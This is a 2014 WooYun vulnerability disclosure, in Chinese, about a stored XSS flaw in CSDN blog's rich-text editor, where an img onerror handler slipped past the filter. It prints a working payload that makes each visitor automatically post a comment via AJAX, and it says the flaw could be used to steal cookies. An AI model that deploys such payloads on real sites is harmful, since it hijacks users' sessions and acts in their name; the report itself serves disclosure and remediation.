当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061990

漏洞标题:CSDN博客的富文本输入XSS过滤不严(自动XX)

相关厂商:CSDN开发者社区

漏洞作者: 路人甲

提交时间:2014-05-23 15:19

修复时间:2014-07-07 15:19

公开时间:2014-07-07 15:19

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-23: 细节已通知厂商并且等待厂商处理中
2014-05-24: 厂商已经确认,细节仅向厂商公开
2014-06-03: 细节向核心白帽子及相关领域专家公开
2014-06-13: 细节向普通白帽子公开
2014-06-23: 细节向实习白帽子公开
2014-07-07: 细节向公众公开

简要描述:

CSDN博客的富文本输入XSS过滤不严(自动XX)

详细说明:

CSDN写博客->富文本输入->XSS过滤了<script> onmouseover这些,但是
<img src=# onerror="alert(1)">没有过滤掉。可以用来拿cookie, 自动发帖,自动回复,等等

<img style="display:none" src="#" onerror="var url ='http://blog.csdn.net/nanjingjiangbiao/comment/submit?id=26670315';var poststr = 'content=autoreplaybytonyxss&amp;commentid=&amp;replyId=';var ajax =null;if(window.ActiveXObject) {ajax = new ActiveXObject('Microsoft.XMLHTTP');}else if (window.XMLHttpRequest){ajax = new XMLHttpRequest();}ajax.open('POST', url, true);ajax.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');ajax.send(poststr);ajax.onreadystatechange = function(){if(ajax.readyState ==4 &amp;&amp; ajax.status == 200){}}" alt="" />


上面这段代码就能嵌入富文本编辑器,然后用Ajax自动回复博客

漏洞证明:

访问下面这个博客
http://blog.csdn.net/thestoryoftony/article/details/26670315
你就能看到自己的自动回复。

csdn.png

修复方案:

加强XSS过滤哦,亲

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-05-24 00:12

厂商回复:

收到,尽快修复,多谢。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-23 22:31 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    厂商应该是北京创新乐知信息技术有限公司江苏乐知网络技术有限公司